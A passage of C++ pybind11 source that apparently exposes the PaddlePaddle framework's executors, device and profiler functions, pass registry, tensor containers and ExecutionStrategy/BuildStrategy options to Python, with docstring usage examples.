platform::errors::InvalidArgument(
"The provided OpDesc is not "
"initialized, the reason is: %s",
desc.InitializationErrorString()));
return OpRegistry::CreateOp(desc);
})
.def("run",
[](OperatorBase &self, const Scope &scope,
const platform::CPUPlace &place) {
pybind11::gil_scoped_release release;
self.Run(scope, place);
})
.def("run",
[](OperatorBase &self, const Scope &scope,
const platform::XPUPlace &place) {
pybind11::gil_scoped_release release;
self.Run(scope, place);
})
.def("run",
[](OperatorBase &self, const Scope &scope,
const platform::NPUPlace &place) {
pybind11::gil_scoped_release release;
self.Run(scope, place);
})
.def("run",
[](OperatorBase &self, const Scope &scope,
const platform::CUDAPlace &place) {
pybind11::gil_scoped_release release;
self.Run(scope, place);
})
.def("run",
[](OperatorBase &self, const Scope &scope,
const platform::CUDAPinnedPlace &place) {
pybind11::gil_scoped_release release;
self.Run(scope, place);
})
.def("run",
[](OperatorBase &self, const Scope &scope,
const platform::MLUPlace &place) {
pybind11::gil_scoped_release release;
self.Run(scope, place);
})
.def("type",
[](const OperatorBase &op) -> std::string { return op.Type(); })
.def("outputs",
[](const OperatorBase &op)
-> std::map<std::string, std::vector<std::string>> {
return op.Outputs();
})
.def("output_vars",
[](const OperatorBase &op) { return op.OutputVars(true); })
.def("inputs", [](const OperatorBase &op) { return op.Inputs(); })
.def("input_vars", [](const OperatorBase &op) { return op.InputVars(); })
.def("__str__", &OperatorBase::DebugString)
.def("no_intermediate_outputs",
[](const OperatorBase &op) { return op.OutputVars(false); })
.def("support_gpu", &OperatorBase::SupportGPU);
py::class_<framework::ExecutorPrepareContext>(m, "ExecutorPrepareContext")
.def(py::init<const ProgramDesc &, size_t>());
py::class_<framework::TrainerBase, std::shared_ptr<framework::TrainerBase>>(
m, "TrainerBase")
.def("get_worker_scope",
[](TrainerBase &self, int thread_id) -> Scope * {
return self.GetWorkerScope(thread_id);
},
py::return_value_policy::reference)
.def("finalize", &TrainerBase::Finalize)
.def("ResetDataset", &TrainerBase::ResetDataset);
m.def("_get_eager_deletion_vars", &framework::GetEagerDeletionCleanVars);
py::class_<framework::Executor>(m, "Executor")
.def(py::init<const platform::Place &>())
.def("close", &Executor::Close)
.def("run_from_dataset", &Executor::RunFromDataset,
py::call_guard<py::gil_scoped_release>())
.def("release_trainer", &Executor::ReleaseTrainer,
py::call_guard<py::gil_scoped_release>())
.def("init_for_dataset",
[](Executor &self, const ProgramDesc &prog,
const std::string &trainer_desc, Scope *scope,
Dataset *dataset) -> std::shared_ptr<TrainerBase> {
pybind11::gil_scoped_release release;
return self.InitForDataset(prog, trainer_desc, scope, dataset);
})
.def("run_from_dataset",
[](Executor &self, std::shared_ptr<TrainerBase> trainer) {
pybind11::gil_scoped_release release;
self.RunFromDataset(trainer);
})
.def("run_prepared_ctx",
[](Executor &self, ExecutorPrepareContext *ctx, Scope *scope,
std::map<std::string, const LoDTensor *> *feed_targets,
std::map<std::string, FetchType *> *fetch_targets,
bool create_local_scope = true, bool create_vars = true,
const std::string &feed_holder_name = "feed",
const std::string &fetch_holder_name = "fetch") {
pybind11::gil_scoped_release release;
self.RunPreparedContext(ctx, scope, feed_targets, fetch_targets,
create_local_scope, create_vars,
feed_holder_name, fetch_holder_name);
})
.def("run_prepared_ctx",
[](Executor &self, ExecutorPrepareContext *ctx, Scope *scope,
bool create_local_scope = true, bool create_vars = true,
bool keep_kids = false) {
pybind11::gil_scoped_release release;
self.RunPreparedContext(ctx, scope, create_local_scope,
create_vars, keep_kids);
})
.def("prepare",
[](Executor &self, const ProgramDesc &program, int block_id,
const std::vector<std::string> &skip_ref_cnt_vars =
std::vector<std::string>(),
bool force_disable_gc = false) {
pybind11::gil_scoped_release release;
return self.Prepare(program, block_id, skip_ref_cnt_vars,
force_disable_gc);
})
.def("create_variables", &Executor::CreateVariables)
.def("run", [](Executor &self, const ProgramDesc &prog, Scope *scope,
int block_id, bool create_local_scope, bool create_vars,
const std::vector<std::string> &fetch_vars) {
pybind11::gil_scoped_release release;
self.Run(prog, scope, block_id, create_local_scope, create_vars,
fetch_vars);
});
py::class_<framework::interpreter::CostInfo>(m, "CostInfo")
.def(py::init<>())
.def("total_time",
[](interpreter::CostInfo &self) { return self.total_time; })
.def("device_memory_bytes", [](interpreter::CostInfo &self) {
return self.device_memory_bytes;
});
py::class_<framework::StandaloneExecutor>(m, "StandaloneExecutor")
.def(py::init<const platform::Place &, const ProgramDesc &,
const ProgramDesc &, Scope *>())
.def("run",
[](StandaloneExecutor &self,
const std::unordered_map<std::string, py::array> &input_dict,
std::vector<std::string> fetch_names) {
std::vector<framework::LoDTensor> feed_tensors;
std::vector<std::string> feed_names;
for (auto &item : input_dict) {
framework::LoDTensor t;
SetTensorFromPyArray<platform::CPUPlace>(
&t, item.second, platform::CPUPlace(), false);
feed_names.push_back(item.first);
feed_tensors.push_back(t);
}
paddle::framework::FetchList ret;
{
pybind11::gil_scoped_release release;
ret = self.Run(feed_names, feed_tensors, fetch_names);
}
return py::cast(std::move(ret));
})
.def("run",
[](StandaloneExecutor &self,
const std::unordered_map<std::string, framework::LoDTensor>
&input_dict,
std::vector<std::string> fetch_names) {
std::vector<framework::LoDTensor> feed_tensors;
std::vector<std::string> feed_names;
for (auto &item : input_dict) {
feed_names.push_back(item.first);
feed_tensors.push_back(item.second);
}
paddle::framework::FetchList ret;
{
pybind11::gil_scoped_release release;
ret = self.Run(feed_names, feed_tensors, fetch_names);
}
return py::cast(std::move(ret));
})
.def("run",
[](StandaloneExecutor &self, std::vector<std::string> feed_names,
std::vector<std::string> fetch_names) {
paddle::framework::FetchList ret;
{
pybind11::gil_scoped_release release;
ret = self.Run(feed_names, fetch_names);
}
return py::cast(std::move(ret));
})
.def("dry_run",
[](StandaloneExecutor &self,
const std::unordered_map<std::string, py::array> &input_dict) {
std::vector<framework::LoDTensor> feed_tensors;
std::vector<std::string> feed_names;
for (auto &item : input_dict) {
framework::LoDTensor t;
SetTensorFromPyArray<platform::CPUPlace>(
&t, item.second, platform::CPUPlace(), false);
feed_names.push_back(item.first);
feed_tensors.push_back(t);
}
framework::interpreter::CostInfo cost_info;
{
pybind11::gil_scoped_release release;
cost_info = self.DryRun(feed_names, feed_tensors);
}
return cost_info;
});
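  // A hedged sketch of the StandaloneExecutor flow from Python (the program
  // and scope objects are illustrative; numpy feeds are converted to CPU
  // LoDTensors by the overload above before Run is called with the GIL
  // released):
  //
  //   exe = core.StandaloneExecutor(place, startup_prog.desc, main_prog.desc,
  //                                 scope)
  //   fetch_list = exe.run({"x": np_array}, ["out_var_name"])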
m.def("init_gflags", framework::InitGflags);
m.def("init_glog", framework::InitGLOG);
m.def("load_op_meta_info_and_register_op",
framework::LoadOpMetaInfoAndRegisterOp);
m.def("init_devices", []() { framework::InitDevices(); });
m.def("is_compiled_with_cuda", IsCompiledWithCUDA);
m.def("is_compiled_with_ascend", IsCompiledWithAscend);
m.def("is_compiled_with_rocm", IsCompiledWithROCM);
m.def("is_compiled_with_npu", IsCompiledWithNPU);
m.def("is_compiled_with_ipu", IsCompiledWithIPU);
m.def("is_compiled_with_xpu", IsCompiledWithXPU);
m.def("is_compiled_with_mkldnn", IsCompiledWithMKLDNN);
m.def("is_compiled_with_nccl", IsCompiledWithNCCL);
m.def("is_compiled_with_cinn", IsCompiledWithCINN);
m.def("is_compiled_with_mlu", IsCompiledWithMLU);
m.def("_is_compiled_with_heterps", IsCompiledWithHETERPS);
m.def("supports_bfloat16", SupportsBfloat16);
m.def("supports_bfloat16_fast_performance", SupportsBfloat16FastPerformance);
m.def("supports_int8", SupportsInt8);
m.def("supports_vnni", SupportsVNNI);
m.def("op_supported_infos", imperative::OpSupportedInfos);
m.def("is_compiled_with_brpc", IsCompiledWithBrpc);
m.def("is_compiled_with_dist", IsCompiledWithDIST);
m.def("_cuda_synchronize", [](const platform::CUDAPlace &place) {
platform::DeviceContextPool::Instance().Get(place)->Wait();
});
m.def("get_float_stats", []() {
std::vector<paddle::platform::ExportedStatValue<float>> float_stats;
paddle::platform::StatRegistry<float>::Instance().publish(float_stats);
std::unordered_map<std::string, float> stats_map;
for (const auto &stat : float_stats) {
stats_map[stat.key] = stat.value;
}
return stats_map;
});
m.def("get_int_stats", []() {
std::vector<paddle::platform::ExportedStatValue<int64_t>> int_stats;
paddle::platform::StatRegistry<int64_t>::Instance().publish(int_stats);
std::unordered_map<std::string, int64_t> stats_map;
for (const auto &stat : int_stats) {
stats_map[stat.key] = stat.value;
}
return stats_map;
});
m.def("run_cmd",
[](const std::string &cmd, int time_out = -1,
int sleep_inter = -1) -> const std::string {
return paddle::framework::shell_get_command_output(cmd, time_out,
sleep_inter);
},
py::arg("cmd"), py::arg("time_out") = -1, py::arg("sleep_inter") = -1);
m.def("shell_execute_cmd",
[](const std::string &cmd, int time_out = 0, int sleep_inter = 0,
bool redirect_stderr = false) -> std::vector<std::string> {
return paddle::framework::shell_execute_cmd(
cmd, time_out, sleep_inter, redirect_stderr);
},
py::arg("cmd"), py::arg("time_out") = 0, py::arg("sleep_inter") = 0,
py::arg("redirect_stderr") = false);
#if defined(PADDLE_WITH_CUDA) || defined(PADDLE_WITH_HIP)
m.def("is_float16_supported", [](const platform::CUDAPlace &place) -> bool {
    // Only GPUs with compute capability >= 5.3 (returned as 53) support float16
return platform::GetGPUComputeCapability(place.device) >= 53;
});
#endif
m.def("set_feed_variable",
static_cast<void (*)(Scope *, const LoDTensor &, const std::string &,
size_t)>(&framework::SetFeedVariable));
m.def("set_feed_variable",
static_cast<void (*)(Scope *, const Strings &, const std::string &,
size_t)>(&framework::SetFeedVariable));
m.def("get_fetch_variable",
[](const Scope &scope, const std::string &var_name,
size_t index) -> py::object {
auto &var = framework::GetFetchVariable(scope, var_name, index);
if (data_is_lod_tensor(var)) {
return py::cast(BOOST_GET(LoDTensor, var));
} else {
return py::cast(BOOST_GET(LoDTensorArray, var));
}
});
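  // set_feed_variable / get_fetch_variable are the scope-level halves of the
  // feed/fetch protocol: feed ops read what set_feed_variable stored, and
  // fetch ops store what get_fetch_variable retrieves. A hedged sketch
  // (variable names are illustrative):
  //
  //   core.set_feed_variable(scope, feed_tensor, "feed", 0)
  //   # ... run the program ...
  //   result = core.get_fetch_variable(scope, "fetch", 0)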
m.def("get_variable_tensor", framework::GetVariableTensor);
m.def("_is_program_version_supported", IsProgramVersionSupported);
BindProgramDesc(&m);
BindBlockDesc(&m);
BindVarDsec(&m);
BindOpDesc(&m);
BindCostModel(&m);
BindConstValue(&m);
BindGlobalValueGetterSetter(&m);
BindProcessMeshDesc(&m);
BindFleetExecutor(&m);
BindTCPStore(&m);
py::class_<framework::LoDRankTable>(m, "LodRankTable")
.def("items", [](framework::LoDRankTable &table) {
std::vector<std::pair<size_t, size_t>> res;
for (auto &item : table.items()) {
res.push_back({item.index, item.length});
}
return res;
});
py::class_<LoDTensorArray> pylodtensorarray(m, "LoDTensorArray", R"DOC(
    LoDTensorArray is an array of LoDTensor; it supports operator[], len() and for-loop iteration.
Examples:
.. code-block:: python
import paddle.fluid as fluid
arr = fluid.LoDTensorArray()
)DOC");
g_framework_lodtensorarray_pytype =
reinterpret_cast<PyTypeObject *>(pylodtensorarray.ptr());
pylodtensorarray
.def("__init__",
[](LoDTensorArray &instance) { new (&instance) LoDTensorArray(); })
.def("__getitem__",
[](LoDTensorArray &self, size_t i) { return &self.at(i); },
py::return_value_policy::reference)
.def("__len__", [](LoDTensorArray &self) { return self.size(); })
.def("__setitem__",
[](LoDTensorArray &self, size_t i, const LoDTensor &t) {
PADDLE_ENFORCE_LT(i, self.size(),
platform::errors::InvalidArgument(
"The index to set is larger than the size "
"of LoDTensorArray."));
self[i].ShareDataWith(t);
self[i].set_lod(t.lod());
})
.def("append",
[](LoDTensorArray &self, const LoDTensor &t) {
self.emplace_back();
self.back().ShareDataWith(t);
self.back().set_lod(t.lod());
},
py::arg("tensor"), R"DOC(
             Append a LoDTensor to LoDTensorArray.
Args:
tensor (LoDTensor): The LoDTensor to be appended.
Returns:
None.
Examples:
.. code-block:: python
import paddle.fluid as fluid
import numpy as np
arr = fluid.LoDTensorArray()
t = fluid.LoDTensor()
t.set(np.ndarray([5, 30]), fluid.CPUPlace())
arr.append(t)
)DOC")
.def("_move_to_list",
[](LoDTensorArray &self) -> py::list {
py::list res(self.size());
for (size_t i = 0; i < self.size(); ++i) {
res[i] = py::cast(std::move(self[i]));
}
self.clear();
return res;
},
py::return_value_policy::take_ownership);
py::class_<FetchList>(m, "FetchList", R"DOC( FetchList is a
vector of boost::variant<LoDTensor, LoDTensorArray>.
)DOC")
.def("_move_to_list",
[](FetchList &self) -> py::list {
py::list res(self.size());
for (size_t i = 0; i < self.size(); ++i) {
if (data_is_lod_tensor(self[i])) {
auto &data = BOOST_GET(LoDTensor, self[i]);
res[i] = py::cast(std::move(data));
} else {
auto &data = BOOST_GET(LoDTensorArray, self[i]);
py::list tmp(data.size());
for (size_t j = 0; j < data.size(); ++j) {
tmp[j] = py::cast(std::move(data[j]));
}
res[i] = std::move(tmp);
}
}
self.clear();
return res;
},
py::return_value_policy::take_ownership)
.def("append",
[](FetchList &self, const LoDTensor &t) {
self.emplace_back();
auto &lod_tensor = BOOST_GET(LoDTensor, self.back());
lod_tensor.ShareDataWith(t);
lod_tensor.set_lod(t.lod());
},
py::arg("var"))
.def("append",
[](FetchList &self, const LoDTensorArray &t) {
             // Construct the variant as a LoDTensorArray of the right size so
             // the element-wise ShareDataWith below stays in bounds.
             self.emplace_back(LoDTensorArray(t.size()));
             auto &lod_tensor_array = BOOST_GET(LoDTensorArray, self.back());
for (size_t i = 0; i < t.size(); ++i) {
lod_tensor_array[i].ShareDataWith(t[i]);
lod_tensor_array[i].set_lod(t[i].lod());
}
},
py::arg("var"));
py::class_<FetchUnmergedList>(m, "FetchUnmergedList", R"DOC(
        FetchUnmergedList is a 2-D array of FetchType (boost::variant<LoDTensor, LoDTensorArray>).
)DOC")
.def("_move_to_list",
[](FetchUnmergedList &self) -> py::list {
py::list res(self.size());
for (size_t i = 0; i < self.size(); ++i) {
py::list tmp(self[i].size());
for (size_t j = 0; j < self[i].size(); ++j) {
if (data_is_lod_tensor(self[i][j])) {
auto &var = BOOST_GET(LoDTensor, self[i][j]);
tmp[j] = py::cast(std::move(var));
} else {
auto &var = BOOST_GET(LoDTensorArray, self[i][j]);
py::list tmp_array(var.size());
for (size_t k = 0; k < var.size(); ++k) {
tmp_array[k] = std::move(var[k]);
}
tmp[j] = std::move(tmp_array);
}
}
res[i] = std::move(tmp);
self[i].clear();
}
self.clear();
return res;
},
py::return_value_policy::take_ownership);
m.def("op_support_gpu", OpSupportGPU);
#if defined(PADDLE_WITH_CUDA) || defined(PADDLE_WITH_HIP)
m.def("get_cuda_device_count", platform::GetGPUDeviceCount);
m.def("cuda_empty_cache", [] {
for (int dev_id : platform::GetSelectedDevices()) {
auto *dev_ctx = platform::DeviceContextPool::Instance().GetByPlace(
platform::CUDAPlace(dev_id));
dev_ctx->cudnn_workspace_handle().ResetWorkspace();
}
platform::EmptyCache();
});
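  // A hedged usage sketch: cuda_empty_cache first resets each selected
  // device's cuDNN workspace (above), then returns cached allocations to the
  // driver. Typically called after dropping large Python-side references:
  //
  //   del large_tensor
  //   core.cuda_empty_cache()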
m.def("get_device_properties",
[](int id) -> const gpuDeviceProp & {
return platform::GetDeviceProperties(id);
},
py::return_value_policy::copy);
py::class_<gpuDeviceProp>(m, "_gpuDeviceProperties")
.def_property_readonly(
"name", [](const gpuDeviceProp &prop) { return prop.name; })
.def_property_readonly(
"major", [](const gpuDeviceProp &prop) { return prop.major; })
.def_property_readonly(
"minor", [](const gpuDeviceProp &prop) { return prop.minor; })
.def_property_readonly(
"total_memory",
[](const gpuDeviceProp &prop) { return prop.totalGlobalMem; })
.def_property_readonly(
"multi_processor_count",
[](const gpuDeviceProp &prop) { return prop.multiProcessorCount; })
.def_property_readonly(
"is_multi_gpu_board",
[](const gpuDeviceProp &prop) { return prop.isMultiGpuBoard; })
.def_property_readonly(
"is_integrated",
[](const gpuDeviceProp &prop) { return prop.integrated; })
.def("__repr__", [](const gpuDeviceProp &prop) {
std::stringstream ostr;
ostr << "_gpuDeviceProperties(name='" << prop.name
<< "', major=" << prop.major << ", minor=" << prop.minor
<< ", total_memory=" << prop.totalGlobalMem / (1024 * 1024)
<< "MB, multi_processor_count=" << prop.multiProcessorCount << ")";
return ostr.str();
});
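  // A hedged sketch of querying device properties from Python (device 0 is
  // assumed to exist):
  //
  //   prop = core.get_device_properties(0)
  //   print(prop.name, prop.major, prop.minor, prop.total_memory)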
#if !defined(PADDLE_WITH_HIP) && !defined(_WIN32)
m.def("nvprof_init", platform::CudaProfilerInit);
m.def("nvprof_start", platform::CudaProfilerStart);
m.def("nvprof_stop", platform::CudaProfilerStop);
m.def("nvprof_nvtx_push", platform::CudaNvtxRangePush);
m.def("nvprof_nvtx_pop", platform::CudaNvtxRangePop);
m.def("nvprof_enable_record_event", platform::NvprofEnableRecordEvent);
m.def("nvprof_disable_record_event", platform::NvprofDisableRecordEvent);
#endif
#endif
#ifdef PADDLE_WITH_ASCEND_CL
m.def("get_npu_device_count", platform::GetNPUDeviceCount);
m.def("npu_finalize", []() {
platform::HCCLCommContext::Instance().ReleaseHCCLComms();
auto &pool = platform::DeviceContextPool::Instance();
auto devices = platform::GetSelectedNPUDevices();
for (size_t i = 0; i < devices.size(); ++i) {
platform::NPUDeviceGuard guard(devices[i]);
pool.Get(platform::NPUPlace(devices[i]))->Wait();
}
platform::AclInstance::Instance().Finalize();
});
py::class_<platform::NPUProfConfigWrapper>(m, "NPUProfConfigWrapper");
m.def("npu_prof_init", platform::NPUProfilerInit);
m.def("npu_prof_start", [](platform::NPUProfConfigWrapper c) {
platform::NPUProfilerStart(c.ptr());
});
m.def("npu_prof_stop", [](platform::NPUProfConfigWrapper c) {
platform::NPUProfilerStop(c.ptr());
});
m.def("npu_prof_finalize", platform::NPUProfilerFinalize);
m.def("npu_prof_create_config", []() {
return platform::NPUProfConfigWrapper(platform::NPUProfilerCreateConfig());
});
m.def("npu_prof_destropy_config", [](platform::NPUProfConfigWrapper c) {
platform::NPUProfilerDestroyConfig(c.ptr());
});
#endif
#ifdef PADDLE_WITH_IPU
m.def("get_ipu_device_count", platform::GetIPUDeviceCount);
#endif
#ifdef PADDLE_WITH_MLU
m.def("get_mlu_device_count", platform::GetMLUDeviceCount);
#endif
py::enum_<platform::TracerOption>(m, "TracerOption", py::arithmetic())
.value("kDefault", platform::TracerOption::kDefault)
.value("kOpDetail", platform::TracerOption::kOpDetail)
.value("kAllOpDetail", platform::TracerOption::kAllOpDetail)
.export_values();
py::enum_<platform::ProfilerState>(m, "ProfilerState", py::arithmetic())
.value("kDisabled", platform::ProfilerState::kDisabled)
.value("kCPU", platform::ProfilerState::kCPU)
.value("kCUDA", platform::ProfilerState::kCUDA)
.value("kAll", platform::ProfilerState::kAll)
.export_values();
py::enum_<platform::EventSortingKey>(m, "EventSortingKey", py::arithmetic())
.value("kDefault", platform::EventSortingKey::kDefault)
.value("kCalls", platform::EventSortingKey::kCalls)
.value("kTotal", platform::EventSortingKey::kTotal)
.value("kMin", platform::EventSortingKey::kMin)
.value("kMax", platform::EventSortingKey::kMax)
.value("kAve", platform::EventSortingKey::kAve)
.export_values();
m.def("set_tracer_option", platform::SetTracerOption);
m.def("enable_profiler", platform::EnableProfiler);
m.def("disable_profiler", platform::DisableProfiler);
m.def("is_profiler_enabled", platform::IsProfileEnabled);
m.def("reset_profiler", platform::ResetProfiler);
m.def("register_pass", [](const std::string &pass_type, py::object callable) {
PADDLE_ENFORCE_EQ(
framework::ir::PassRegistry::Instance().Has(pass_type), false,
platform::errors::AlreadyExists("Pass '%s' is registered more than "
"once. Please use another name.",
pass_type));
callable.inc_ref();
framework::ir::PassRegistry::Instance().Insert(pass_type, [pass_type,
callable]() {
py::gil_scoped_acquire guard;
std::unique_ptr<framework::ir::Pass> pass(
new framework::ir::GeneratePass(py::cast<std::string>(callable())));
return pass;
});
});
m.def("get_pass", [](const std::string &pass_type) {
auto pass = framework::ir::PassRegistry::Instance().Get(pass_type);
return std::shared_ptr<framework::ir::Pass>(std::move(pass));
});
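  // register_pass stores a Python callable whose return value is parsed as a
  // serialized GeneratePass description in the factory lambda above. A hedged
  // sketch (build_pass_desc is a hypothetical helper producing that string):
  //
  //   core.register_pass("my_fusion_pass", lambda: build_pass_desc())
  //   my_pass = core.get_pass("my_fusion_pass")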
m.def("size_of_dtype", framework::SizeOfType);
#if defined(PADDLE_WITH_CUDA) || defined(PADDLE_WITH_HIP)
m.def("set_cublas_switch", platform::SetAllowTF32Cublas);
m.def("get_cublas_switch", platform::AllowTF32Cublas);
m.def("set_cudnn_switch", platform::SetAllowTF32Cudnn);
m.def("get_cudnn_switch", platform::AllowTF32Cudnn);
#endif // PADDLE_WITH_CUDA
m.def("clear_executor_cache",
[]() { framework::ExecutorInfoCache::Instance().Finalize(); });
using VarQuantScale =
std::unordered_map<std::string, std::pair<bool, LoDTensor>>;
py::class_<ir::Pass, std::shared_ptr<ir::Pass>> pass(m, "Pass");
pass.def(py::init())
.def("has", &ir::Pass::Has)
.def("set_not_owned",
[](ir::Pass &self, const std::string &attr_name, ProgramDesc &attr) {
self.SetNotOwned<ProgramDesc>(attr_name, &attr);
})
.def(
"set",
[](ir::Pass &self, const std::string &name, const std::string &attr) {
self.Set<std::string>(name, new std::string(attr));
})
.def("set", [](ir::Pass &self, const std::string &name,
bool val) { self.Set<bool>(name, new bool(val)); })
.def("set", [](ir::Pass &self, const std::string &name,
int val) { self.Set<const int>(name, new int(val)); })
.def("set",
[](ir::Pass &self, const std::string &name,
std::vector<std::string> set) {
self.Set(name, new std::vector<std::string>(set));
})
.def("set",
[](ir::Pass &self, const std::string &name,
std::unordered_set<std::string> set) {
self.Set(name, new std::unordered_set<std::string>(set));
})
.def("set",
[](ir::Pass &self, const std::string &name,
std::unordered_set<int> set) {
self.Set(name, new std::unordered_set<int>(set));
})
.def("set",
[](ir::Pass &self, const std::string &name, VarQuantScale scales) {
self.Set(name, new VarQuantScale(scales));
})
.def("type", &ir::Pass::Type)
.def("apply", [](ir::Pass &self, std::shared_ptr<ir::Graph> graph) {
self.Apply(graph.get());
});
py::class_<ir::PassBuilder, std::shared_ptr<ir::PassBuilder>> pb(
m, "PassBuilder");
pb.def(py::init())
.def("append_pass",
[](ir::PassBuilder &self,
const std::string &pass_type) -> std::shared_ptr<ir::Pass> {
return self.AppendPass(pass_type);
})
.def("all_passes", [](ir::PassBuilder &self) { return self.AllPasses(); })
.def("insert_pass",
[](ir::PassBuilder &self, size_t idx, const std::string &pass_type) {
return self.InsertPass(idx, pass_type);
})
.def("remove_pass",
[](ir::PassBuilder &self, size_t idx) { self.RemovePass(idx); });
// -- python binds for parallel executor.
py::class_<ParallelExecutor> pe(m, "ParallelExecutor");
py::class_<ExecutionStrategy> exec_strategy(pe, "ExecutionStrategy", R"DOC(
    ExecutionStrategy allows the user to more precisely control how to run
the program in ParallelExecutor by setting the property.
Returns:
ExecutionStrategy: An ExecutionStrategy object.
Examples:
.. code-block:: python
import paddle
import paddle.static as static
import paddle.nn.functional as F
paddle.enable_static()
x = static.data(name='x', shape=[None, 13], dtype='float32')
y = static.data(name='y', shape=[None, 1], dtype='float32')
y_predict = static.nn.fc(input=x, size=1, act=None)
cost = F.square_error_cost(input=y_predict, label=y)
avg_loss = paddle.mean(cost)
sgd_optimizer = paddle.optimizer.SGD(learning_rate=0.001)
sgd_optimizer.minimize(avg_loss)
exec_strategy = static.ExecutionStrategy()
exec_strategy.num_threads = 4
train_exe = static.ParallelExecutor(use_cuda=False,
loss_name=avg_loss.name,
exec_strategy=exec_strategy)
)DOC");
py::enum_<paddle::platform::DeviceType>(m, "DeviceType", py::arithmetic())
.value("CPU", paddle::platform::DeviceType::CPU)
.value("CUDA", paddle::platform::DeviceType::CUDA)
.value("XPU", paddle::platform::DeviceType::XPU);
exec_strategy.def(py::init())
.def_property(
"num_threads",
[](const ExecutionStrategy &self) { return self.num_threads_; },
[](ExecutionStrategy &self, size_t num_threads) {
self.num_threads_ = num_threads;
},
R"DOC(
                The type is INT. num_threads represents the size of the thread pool that
                is used to run the operators of the current program in ParallelExecutor.
                If :math:`num\_threads=1`, all the operators will execute one by one,
                but the order may differ between iterations.
                If it is not set, it will be set in ParallelExecutor according to the
                device type and device count: for GPU, :math:`num\_threads=device\_count*4`; for CPU,
                :math:`num\_threads=CPU\_NUM*4`. The explanation of :math:`CPU\_NUM` is in ParallelExecutor;
                if it is not set, ParallelExecutor will get the CPU count by calling
                `multiprocessing.cpu_count()`. Default 0.
Examples:
.. code-block:: python
import paddle
import paddle.static as static
paddle.enable_static()
exec_strategy = static.ExecutionStrategy()
exec_strategy.num_threads = 4
)DOC")
.def_property(
"_use_device",
[](const ExecutionStrategy &self) { return self.use_device_; },
[](ExecutionStrategy &self, paddle::platform::DeviceType use_device) {
self.use_device_ = use_device;
}) // NOTE(liuyuhui): Doesn't add doc for 'use_device', because
             // use_device isn't exposed to users.
.def_property(
"allow_op_delay",
[](const ExecutionStrategy &self) { return self.allow_op_delay_; },
[](ExecutionStrategy &self, bool allow_op_delay) {
self.allow_op_delay_ = allow_op_delay;
},
R"DOC(The type is BOOL, allow_op_delay represents whether to delay the
communication operators to run, it may make the execution faster.
Note that this option is invalid now, and it will be removed in
next version. Default False.)DOC")
.def_property(
"num_iteration_per_drop_scope",
[](const ExecutionStrategy &self) {
return self.num_iteration_per_drop_scope_;
},
[](ExecutionStrategy &self, size_t num_iteration_per_drop_scope) {
self.num_iteration_per_drop_scope_ = num_iteration_per_drop_scope;
},
R"DOC(The type is INT, num_iteration_per_drop_scope indicates how
many iterations to clean up the temp variables which
is generated during execution. It may make the execution faster,
because the temp variable's shape maybe the same between two iterations.
Default 100.
.. note::
1. If you fetch data when calling the 'run', the ParallelExecutor
will clean up the temp variables at the end of the current iteration.
2. In some NLP model, it may cause the GPU memory is insufficient,
in this case, you should reduce `num_iteration_per_drop_scope`.
Examples:
.. code-block:: python
import paddle
import paddle.static as static
paddle.enable_static()
exec_strategy = static.ExecutionStrategy()
exec_strategy.num_iteration_per_drop_scope = 10
)DOC")
.def_property(
"num_iteration_per_run",
[](const ExecutionStrategy &self) {
return self.num_iteration_per_run_;
},
[](ExecutionStrategy &self, size_t num_iteration_per_run) {
self.num_iteration_per_run_ = num_iteration_per_run;
},
R"DOC(This config that how many iteration the executor will run when
user call exe.run() in python。Default: 1.
Examples:
.. code-block:: python
import paddle
import paddle.static as static
paddle.enable_static()
exec_strategy = static.ExecutionStrategy()
exec_strategy.num_iteration_per_run = 10
)DOC")
.def_property(
"use_thread_barrier",
[](const ExecutionStrategy &self) { return self.thread_barrier_; },
[](ExecutionStrategy &self, bool use_thread_barrier) {
self.thread_barrier_ = use_thread_barrier;
},
R"DOC(This config that the this is distributed training with parameter server
)DOC")
.def_property("_dry_run",
[](const ExecutionStrategy &self) { return self.dry_run_; },
[](ExecutionStrategy &self, bool dry_run) {
self.dry_run_ = dry_run;
});
exec_strategy.def_property(
"use_experimental_executor",
[](const ExecutionStrategy &self) {
return self.type_ == ExecutionStrategy::kExperimental;
},
[](ExecutionStrategy &self, bool experimental) {
self.type_ = experimental ? ExecutionStrategy::kExperimental
: ExecutionStrategy::kDefault;
});
py::class_<BuildStrategy> build_strategy(pe, "BuildStrategy", R"DOC(
    BuildStrategy allows the user to more precisely control how to
    build the SSA Graph in ParallelExecutor by setting the property.
    Returns:
        BuildStrategy: A BuildStrategy object.
Examples:
.. code-block:: python
import os
import paddle
import paddle.static as static
paddle.enable_static()
os.environ['CPU_NUM'] = str(2)
places = static.cpu_places()
data = static.data(name="x", shape=[None, 1], dtype="float32")
hidden = static.nn.fc(input=data, size=10)
loss = paddle.mean(hidden)
paddle.optimizer.SGD(learning_rate=0.01).minimize(loss)
build_strategy = static.BuildStrategy()
build_strategy.enable_inplace = True
build_strategy.memory_optimize = True
build_strategy.reduce_strategy = static.BuildStrategy.ReduceStrategy.Reduce
program = static.CompiledProgram(static.default_main_program())
program = program.with_data_parallel(loss_name=loss.name,
build_strategy=build_strategy,
places=places)
)DOC");
py::enum_<BuildStrategy::ReduceStrategy>(build_strategy, "ReduceStrategy")
.value("Reduce", BuildStrategy::ReduceStrategy::kReduce)
.value("AllReduce", BuildStrategy::ReduceStrategy::kAllReduce)
.value("_NoReduce", BuildStrategy::ReduceStrategy::kNoReduce);
py::enum_<BuildStrategy::GradientScaleStrategy>(build_strategy,
"GradientScaleStrategy")
.value("CoeffNumDevice",
BuildStrategy::GradientScaleStrategy::kCoeffNumDevice)
.value("One", BuildStrategy::GradientScaleStrategy::kOne)
.value("Customized", BuildStrategy::GradientScaleStrategy::kCustomized);
build_strategy.def(py::init())
.def("_clear_finalized", &BuildStrategy::ClearFinalized)
.def_property(
"reduce_strategy",
[](const BuildStrategy &self) { return self.reduce_; },
[](BuildStrategy &self, BuildStrategy::ReduceStrategy strategy) {
PADDLE_ENFORCE_NE(self.IsFinalized(), true,
platform::errors::PreconditionNotMet(
"BuildStrategy has been finlaized, cannot be "
"configured again."));
self.reduce_ = strategy;
},
R"DOC((fluid.BuildStrategy.ReduceStrategy, optional): there are two reduce
strategies in ParallelExecutor, AllReduce and Reduce. If you want
that all the parameters' optimization are done on all devices independently,
you should choose AllReduce; otherwise, if you choose Reduce, all the parameters'
optimization will be evenly distributed to different devices, and then
broadcast the optimized parameter to other devices.
Default is 'AllReduce'.
Examples:
.. code-block:: python
import paddle
import paddle.static as static
paddle.enable_static()
build_strategy = static.BuildStrategy()
build_strategy.reduce_strategy = static.BuildStrategy.ReduceStrategy.Reduce
)DOC")
.def_property(
"gradient_scale_strategy",
